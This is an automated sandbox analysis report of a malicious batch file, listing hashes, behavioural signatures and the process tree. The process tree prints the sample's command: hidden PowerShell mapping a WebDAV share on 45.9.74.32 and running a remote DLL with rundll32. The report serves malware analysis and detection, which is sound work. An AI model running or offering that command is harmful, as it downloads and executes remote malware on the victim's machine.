Analysis
-
max time kernel
106s -
max time network
124s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
12-07-2024 08:51
Static task
static1
Behavioral task
behavioral1
Sample
3137250091390725801.bat
Resource
win7-20240705-en
Behavioral task
behavioral2
Sample
3137250091390725801.bat
Resource
win10v2004-20240709-en
General
-
Target
3137250091390725801.bat
-
Size
2KB
-
MD5
fb27c72e4f5534a768b5c87f34fe19b0
-
SHA1
3b4522f7beaa58cb478a8ffcc567cd9f4f6a7381
-
SHA256
634b6479aa998ebb8b0dfc7111ba078972c19ecdafb67aed9c112c011c36acb9
-
SHA512
cf6f3b7ff67b8ca8695aa0e44f59b33915c1247e8b097b22b2c60ee714084c9012ee2288087af9f8985042796a9c4085d274e8df3f841e3a6cad08715721884d
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 1384 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Control Panel\International\Geo\Nation cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1384 powershell.exe 1384 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1384 powershell.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 2752 wordpad.exe 2752 wordpad.exe 2752 wordpad.exe 2752 wordpad.exe 2752 wordpad.exe -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 4624 wrote to memory of 2752 4624 cmd.exe 87 PID 4624 wrote to memory of 2752 4624 cmd.exe 87 PID 4624 wrote to memory of 1384 4624 cmd.exe 89 PID 4624 wrote to memory of 1384 4624 cmd.exe 89 PID 1384 wrote to memory of 4632 1384 powershell.exe 91 PID 1384 wrote to memory of 4632 1384 powershell.exe 91 PID 1384 wrote to memory of 3020 1384 powershell.exe 92 PID 1384 wrote to memory of 3020 1384 powershell.exe 92
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\3137250091390725801.bat"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4624 -
C:\Program Files\Windows NT\Accessories\wordpad.exe"C:\Program Files\Windows NT\Accessories\wordpad.exe"2⤵
- Suspicious use of SetWindowsHookEx
PID:2752
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden net use \\45.9.74.32@8888\davwwwroot\ ; rundll32 \\45.9.74.32@8888\davwwwroot\3432.dll,entry2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1384 -
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" use \\45.9.74.32@8888\davwwwroot\3⤵PID:4632
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" \\45.9.74.32@8888\davwwwroot\3432.dll,entry3⤵PID:3020
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k PrintWorkflow -s PrintWorkflowUserSvc1⤵PID:2668
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82